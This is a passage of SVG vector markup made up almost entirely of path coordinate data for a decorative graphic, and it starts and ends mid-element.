.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path d=\"M731.3,102.1c.1.2,1.4.3,3.2.4-1.4-.4,5.6,0,3.8-.5C733.7,101.9,735.7,102.3,731.3,102.1Z\"></path>\n <path d=\"M637.4,96.4c1.8,0,2.1.2,4.4.2-.6-.2,1.7-.2,2.5-.3A37,37,0,0,0,637.4,96.4Z\"></path>\n <path d=\"M575.1,93.5c3.6-.1,3.2-.7-2.2-.9C574.5,92.9,571.4,93.2,575.1,93.5Z\"></path>\n <path d=\"M530.4,91.7a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C528.1,91.9,531.2,92,530.4,91.7Z\"></path>\n <path d=\"M518.1,90.3c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C522.5,90.4,521.2,90.4,518.1,90.3Z\"></path>\n <path d=\"M529.3,87.2c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.09,41.09,0,0,1,529.3,87.2Z\"></path>\n <path d=\"M661.7,87.7c1,.3,1.7.6,6.2.7C667.9,88,665.7,87.8,661.7,87.7Z\"></path>\n <path d=\"M593.9,80.2c-5.8-.1,1.1-.3-4.5-.4.4.4,1.3.7,3.6,1C592.2,80.4,595.4,80.5,593.9,80.2Z\"></path>\n <path d=\"M525,77.6c-1.6.1-5.2.1-7,0C517.4,78.2,529.5,77.9,525,77.6Z\"></path>\n <path d=\"M745.9,79.3c-.5.2-2.8.6,2.1.8C747,79.9,749.2,79.4,745.9,79.3Z\"></path>\n <path d=\"M661,77.4c-1.2-.3-1.2-.7-3.6-1C655.2,76.6,656.4,77.3,661,77.4Z\"></path>\n <path d=\"M660.4,73.6c2.5-.3,3.6.5,5.7.1-4.9-.6-.6-1.7-4.4-1.8-2.1,1.4-12.4,3.2-5.6,4.7C662.2,75.9,668.4,75,660.4,73.6Z\"></path>\n <path d=\"M636.6,73.4c-6.1-.2-4.3.5.5.6C636.9,73.7,636.7,73.6,636.6,73.4Z\"></path>\n <path d=\"M601.8,71.7c1.4,0,2.8.1,4.3.1l-.4-.4C601.9,71.2,602.2,71.5,601.8,71.7Z\"></path>\n <path d=\"M749.9,68.1c-5.8-.1-3.6.5-.7.7C749,68.5,748.1,68.2,749.9,68.1Z\"></path>\n <path d=\"M593.6,64c-.9-.2,1.2-.5-1.9-.6.5.2-.8.3-4,.2.9.2-1.2.5,1.9.6C588.6,63.9,590.9,63.7,593.6,64Z\"></path>\n <path d=\"M610.1,62.3c-1.6-.4-1.6-.4-.6-.7a23.82,23.82,0,0,1-2.8-.1c-.9,0-1.7,0-1.3.1,4.1.2.6.5-.9.5C608.3,62.2,607.5,62.4,610.1,62.3Z\"></path>\n <path d=\"M749.3,64.2c-.2-.4-.8-.8-3.7-1.1C747,63.7,745.2,64,749.3,64.2Z\"></path>\n <path d=\"M597.7,57.7c-.4.2-2.8.2-2.4.5C598.9,58.2,602.8,57.8,597.7,57.7Z\"></path>\n <path d=\"M601.8,57.5c-5.3-.5,2.2-.4-3.4-.7-1.4.2-1.3.5-2.1.7C598.9,57.6,599.2,57.5,601.8,57.5Z\"></path>\n <path d=\"M748.1,59.7c-2.1.3,1.2.5.9,1C751.3,60.7,750.6,59.9,748.1,59.7Z\"></path>\n <path d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n <path 